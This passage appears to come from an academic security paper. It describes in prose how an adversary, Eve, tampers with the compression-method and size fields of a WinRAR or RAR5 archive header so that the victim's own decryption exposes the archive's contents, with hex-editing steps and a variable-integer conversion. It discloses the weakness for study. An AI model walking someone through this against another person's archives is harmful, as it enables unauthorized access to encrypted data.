16
This attacks requires modification of the archive’s file header. This can be ac
complished with a hex editor. For the purposes of this paper, the author used HxD
HexEditor to test the attack [31]. This is an opensource hex editor that provides
several useful features such as built-in calculation of CRC32.
When carrying out this attack, the original authors noted that there may be
an issue in Step 3 when Bob attempts to decompress the modified file. WinRAR
will return an error that the CRC check failed and the decompressed file will be
automatically deleted. The authors suggest using an unerase utility such as Norton’s
Unerase Utility to recover the lost file. However, this can be prevented using a built-in
feature of WinRAR. When indicating the file path to extract the archive into, the user
can simply check the ”Keep broken files” option under miscellaneous. The user will
still receive an error, but the extracted file will be saved where indicated. An internet
search shows that CRC checksum errors are common when extracting archives and
this is a frequently used method.
There are two important notes involving the modification of the compression
method. First, the compression may be changed to any of six possible methods.
However, modifying the method without altering the packed and total file sizes will
result in some loss of file contents. It is also difficult to accurately predict the cor
rect compression ratio of various methods. To circumvent this issue, the compression
method is set to 0x30, which indicates no compression. The total file size is then
modified to equal the packed file size which requires no extra calculations on the part
of the attacker.
Secondly, the choice of no compression is important to preserving the contents of
the original file. In Step 2, Bob must enter his secret password in order for WinRAR
to proceed with decryption and decompression of the file. WinRAR first decrypts
the contents of the archive before attempting decompression. Recall that Eve has
modified the file header within the archive to indicate that there is no compression
on the file. This results in WinRAR outputting the exact contents contained in
the archive. The file that is obtained from this step is the version of the original
17
Secret.txt compressed using compression method 1. Due to the compression, the
file appears incomprehensible to Bob, who was expecting a decompressed file. This
Corrupted-Secret.txt is all that is needed for Eve to reconstruct Secret.txt.
Eve’s choice of the compression method in Step 4 is significant to the success of the
attack. Adding Corrupted-Secret.txt to a WinRAR archive using no compression
ensures that the archive contains a copy of the original file under compression method
1. If another method is applied, the archive will contain two layers of compression on
the file and subsequent attempts at decompression will result in Corrupt-Secret.txt
as opposed to the desired Secret.txt. Eve can obtain the original text by modifying
the compression method field in the header to compression method 1. When the
archive is unpacked, WinRAR will then use compression method 1, which matches
the compression on Corrupted-Secret.txt and the file will successfully be recovered.
This attack is tested using both WinRAR v5.0 and v3.42 for verification. The
RAR filetype is tested on both WinRAR v3.42 and v5.10 while the new RAR5 format
is tested only on version 5.10. Due to differences in file format, the modification
of the file header is slightly difference between versions. Information discussing the
identification of header information for RAR file types is outlined in Appendix B.
Deeper discussion of the RAR5 format is in the following section.
3.3.1 RAR5 file header
New to the RAR5 format is the use of variable integers as data types in the header
information. Previous versions of WinRAR use unsigned integer values. Variable
length quantities allow for the storage of larger values. It also adds slightly more
work for an adversary to modify the file header. However, this should not be relied
on to increase the security of the archive.
In a variable integer, the lowest 7 bits of each byte contain the integer data while
the highest bit is a continuation flag. 1 indicates that further bytes are present in the
18
sequence while 0 indicates the final byte. RAR5 has a maximum of 10 bytes used to
represent an integer [32].
To convert the decimal numbers to a variable length quantity, the following steps
must be done:
1. Represent the decimal value in binary notation.
2. Beginning with the least significant bit, divide the binary number into into
groups of 7 digits. If a group has fewer than 7 bits available, pad with 0.
3. Append 0 to the beginning of the lowest 7 bits to indicate the end of the integer.
Append 1 to the other groups of 7.
Fig. 3.1. A RAR5 archive with packed size and compression information highlighted
It is most convenient to modify the total file size field first. The total and packed
file sizes can be obtained through the ”info” option in WinRAR. Convert both sizes
to variable length quantities as outlined above and replace the total file size field with
the appropriate integer.
Next, the two bytes containing compression information can be located relative to
the Host OS field. According to the WinRAR technote [32], the compression method
immediately precedes the Host OS field. First, convert the original bytes to binary.
Bits 8-10 define the compression method. In decimal form, 0 indicates no compression
while 5 is best compression. Modify the bits as necessary. Convert the binary number
back to hexadecimal and replace the fields as necessary.